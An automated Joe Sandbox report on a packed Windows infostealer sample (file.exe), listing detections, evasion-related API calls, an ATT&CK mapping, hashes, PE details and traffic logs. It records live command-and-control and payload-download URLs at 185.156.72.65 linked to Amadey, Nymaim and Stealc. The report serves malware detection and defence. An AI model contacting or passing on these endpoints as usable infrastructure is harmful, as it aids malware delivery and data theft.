                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A58A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A720 SetUnhandledExceptionFilter,0_2_0040A720
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04939C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04939C91
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0493A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0493A7F1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0493D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0493D04A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0493A987 SetUnhandledExceptionFilter,0_2_0493A987
                Source: file.exe, file.exe, 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 3Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A2EC cpuid 0_2_0040A2EC
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00410822

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.2080963099.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (one line per tactic; a technique keeps the number that precedes it in the report)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                Execution: 3 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                Defense Evasion: 341 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; Compile After Delivery
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                Discovery: 1 System Time Discovery; 771 Security Software Discovery; 341 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 File and Directory Discovery; 213 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Source | Detection | Scanner | Label | Link
                file.exe | 32% | ReversingLabs | Win32.Infostealer.Tinba |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub4 | 100% | Avira URL Cloud | malware |
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubes | 100% | Avira URL Cloud | malware |
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR | 100% | Avira URL Cloud | malware |
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2 | 100% | Avira URL Cloud | malware |
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubgs2 | 100% | Avira URL Cloud | malware |
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubB | 100% | Avira URL Cloud | malware |
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubk | 100% | Avira URL Cloud | malware |
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub) | 100% | Avira URL Cloud | malware |
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1003 | 100% | Avira URL Cloud | malware |
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubl | 100% | Avira URL Cloud | malware |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub | false | | high
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubes | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub4 | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2 | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubr | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubgs2 | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubl | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubk | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub) | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubB | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubb | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1003 | file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                      185.156.72.65 | unknown | Russian Federation | | 44636 | ITDELUXE-ASRU | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1565650
                      Start date and time:2024-11-30 13:09:07 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 59s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of new started processes analysed:4
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240s for sample files taking high CPU consumption
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • VT rate limit hit for: file.exe
                      Time | Type | Description
                      07:10:31 | API Interceptor | 13139211x Sleep call for process: file.exe modified
                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      185.156.72.65 | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                      185.156.72.65 | file.exe | Get hash | malicious | Amadey, Nymaim | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                      185.156.72.65 | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                      185.156.72.65 | file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | Browse | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                      185.156.72.65 | file.exe | Get hash | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | Browse | 185.156.72.65/soft/download
                      185.156.72.65 | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/soft/download
                      185.156.72.65 | file.exe | Get hash | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.156.72.65/files/download
                      185.156.72.65 | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/soft/download
                      185.156.72.65 | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65/soft/download
                      185.156.72.65 | file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig | Browse | 185.156.72.65/files/download
                      No context
                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                      ITDELUXE-ASRU | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                      ITDELUXE-ASRU | file.exe | Get hash | malicious | Amadey, Nymaim | Browse | 185.156.72.65
                      ITDELUXE-ASRU | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                      ITDELUXE-ASRU | file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | Browse | 185.156.72.65
                      ITDELUXE-ASRU | file.exe | Get hash | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | Browse | 185.156.72.65
                      ITDELUXE-ASRU | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                      ITDELUXE-ASRU | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                      ITDELUXE-ASRU | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                      ITDELUXE-ASRU | file.exe | Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig | Browse | 185.156.72.65
                      ITDELUXE-ASRU | file.exe | Get hash | malicious | Nymaim | Browse | 185.156.72.65
                      No context
                      No context
                      No created / dropped files found
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.94693550831142
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'991'168 bytes
                      MD5:bd23f2ee2aea0a9c0464bc44292485fc
                      SHA1:35b9012235c5a7c3094fc87f5a54fc542e8b78ab
                      SHA256:28c26c34bdb7a826385868133025f41dcb9f5313bb26d1a2ef365d3a9f913bd3
                      SHA512:0ad0d81347acb18661d4d8b13ea6edfc39b1cf5690c8ee85b6cfe1cf40a91084fd70fd503cf2cf937307f2c7a16a386442b52b207f3202e27dfd8de9edbee905
                      SSDEEP:49152:rutpGoG8L/bDG2x7Q+cn32w2iNL2A4vyrWnPOuk4FkQe:rmGObDG2x7Q+c9NG6in1NkQ
                      TLSH:4F9533EA7E536438C5B9343F153F0A2D3FFF9EACA58703AC084246790AB3175D9465A2
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.
                      Icon Hash:cfa99b8a8651798d
                      Entrypoint:0x8a5000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                      Instruction
                      jmp 00007F7E2CC607AAh
                      cmovo ebx, dword ptr [esi]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [esi], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 0Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or dword ptr [eax+00000000h], eax
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      pop es
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], ch
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [esi], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      mov al, 00h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      sub al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or dword ptr [eax], eax
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      Programming Language:
                      • [C++] VS2008 build 21022
                      • [ASM] VS2008 build 21022
                      • [ C ] VS2008 build 21022
                      • [IMP] VS2005 build 50727
                      • [RES] VS2008 build 21022
                      • [LNK] VS2008 build 21022
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6f05b | 0x6f | .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0x8234 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x4a07fc | 0x18 | xdrminwo
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      (unnamed) | 0x1000 | 0x65000 | 0x3ae00 | 6fca4c1f6585720c30beb0be7704b720 | False | 0.9947045846602972 | data | 7.939522646317655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0x66000 | 0x8234 | 0x3c00 | 89d3d7c7aca97c0e42d17d7ea034689e | False | 0.9261067708333334 | data | 7.710258045540537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata | 0x6f000 | 0x1000 | 0x200 | 6eb091ff88873fe4d3f846082d82dda4 | False | 0.154296875 | data | 1.0965193819233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      (unnamed) | 0x70000 | 0x290000 | 0x200 | 2cfaf2e455d8b2f0d583b116a39174d7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      xdrminwo | 0x300000 | 0x1a4000 | 0x1a3e00 | d68365a49227c85b5dc56ba10ff89b9a | False | 0.9920369017936886 | data | 7.9497278462939756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      fjbklart | 0x4a4000 | 0x1000 | 0x400 | cae2201d583ac639bf0027d5f316f0bc | False | 0.72265625 | data | 5.853470289022653 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant | 0x4a5000 | 0x3000 | 0x2200 | ca36a0d19815f1a63cabe699a159f889 | False | 0.06789981617647059 | DOS executable (COM) | 0.7683343307042348 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      RT_CURSOR | 0x66460 | 0xea8 | data | | | 1.0029317697228144
                      RT_CURSOR | 0x67308 | 0x8a8 | data | | | 1.0049638989169676
                      RT_CURSOR | 0x67bb0 | 0x568 | data | | | 1.0079479768786128
                      RT_CURSOR | 0x68118 | 0xea8 | data | | | 1.0029317697228144
                      RT_CURSOR | 0x68fc0 | 0x8a8 | data | | | 1.0049638989169676
                      RT_CURSOR | 0x69868 | 0x568 | SysEx File - IDP | | | 0.5228260869565218
                      RT_ICON | 0x4a085c | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.7557603686635944
                      RT_ICON | 0x4a085c | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.7557603686635944
                      RT_ICON | 0x4a0f24 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.6829875518672199
                      RT_ICON | 0x4a0f24 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.6829875518672199
                      RT_ICON | 0x4a34cc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.8058510638297872
                      RT_ICON | 0x4a34cc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.8058510638297872
                      RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | India | 0
                      RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | Sri Lanka | 0
                      RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | India | 0
                      RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | Sri Lanka | 0
                      RT_STRING | 0x6d494 | 0x520 | empty | Tamil | India | 0
                      RT_STRING | 0x6d494 | 0x520 | empty | Tamil | Sri Lanka | 0
                      RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | India | 0
                      RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | Sri Lanka | 0
                      RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | India | 0
                      RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | Sri Lanka | 0
                      RT_GROUP_CURSOR | 0x6ddfc | 0x30 | empty | | | 0
                      RT_GROUP_CURSOR | 0x6de2c | 0x30 | empty | | | 0
                      RT_GROUP_ICON | 0x4a3934 | 0x30 | data | Tamil | India | 0.9375
                      RT_GROUP_ICON | 0x4a3934 | 0x30 | data | Tamil | Sri Lanka | 0.9375
                      RT_VERSION | 0x4a3964 | 0x254 | data | | | 0.5436241610738255
                      RT_MANIFEST | 0x4a3bb8 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
                      DLL | Import
                      kernel32.dll | lstrcpy
                      Language of compilation system | Country where language is spoken | Map
                      Tamil | India |
                      Tamil | Sri Lanka |
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Nov 30, 2024 13:10:06.338951111 CET | 49704 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:06.459094048 CET | 80 | 49704 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:10:06.459235907 CET | 49704 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:06.459533930 CET | 49704 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:06.579385042 CET | 80 | 49704 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:10:28.420599937 CET | 80 | 49704 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:10:28.420684099 CET | 49704 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:28.420810938 CET | 49704 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:28.540704012 CET | 80 | 49704 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:10:31.423826933 CET | 49737 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:31.543806076 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:10:31.543956995 CET | 49737 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:31.544235945 CET | 49737 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:31.664179087 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:10:53.499304056 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:10:53.500108004 CET | 49737 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:53.500214100 CET | 49737 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:53.620748043 CET | 80 | 49737 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:10:56.708522081 CET | 49792 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:56.829335928 CET | 80 | 49792 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:10:56.829442978 CET | 49792 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:56.829624891 CET | 49792 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:10:56.949450016 CET | 80 | 49792 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:11:04.845303059 CET | 49792 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:07.864347935 CET | 49819 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:07.984347105 CET | 80 | 49819 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:11:07.984534025 CET | 49819 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:07.984884977 CET | 49819 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:08.104729891 CET | 80 | 49819 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:11:29.922316074 CET | 80 | 49819 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:11:29.922391891 CET | 49819 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:29.922621012 CET | 49819 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:30.042584896 CET | 80 | 49819 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:11:32.942296028 CET | 49874 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:33.062264919 CET | 80 | 49874 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:11:33.062388897 CET | 49874 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:33.062859058 CET | 49874 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:33.182742119 CET | 80 | 49874 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:11:54.991302013 CET | 80 | 49874 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:11:54.991492987 CET | 49874 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:54.991652012 CET | 49874 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:55.111745119 CET | 80 | 49874 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:11:58.005794048 CET | 49932 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:58.125736952 CET | 80 | 49932 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:11:58.125839949 CET | 49932 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:58.126240015 CET | 49932 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:11:58.248665094 CET | 80 | 49932 | 185.156.72.65 | 192.168.2.5
                      Nov 30, 2024 13:11:58.876481056 CET | 49932 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:01.895323038 CET | 49940 | 80 | 192.168.2.5 | 185.156.72.65
                      Nov 30, 2024 13:12:02.015465975 CET | 80 | 49940 | 185.156.72.65 | 192.168.2.5
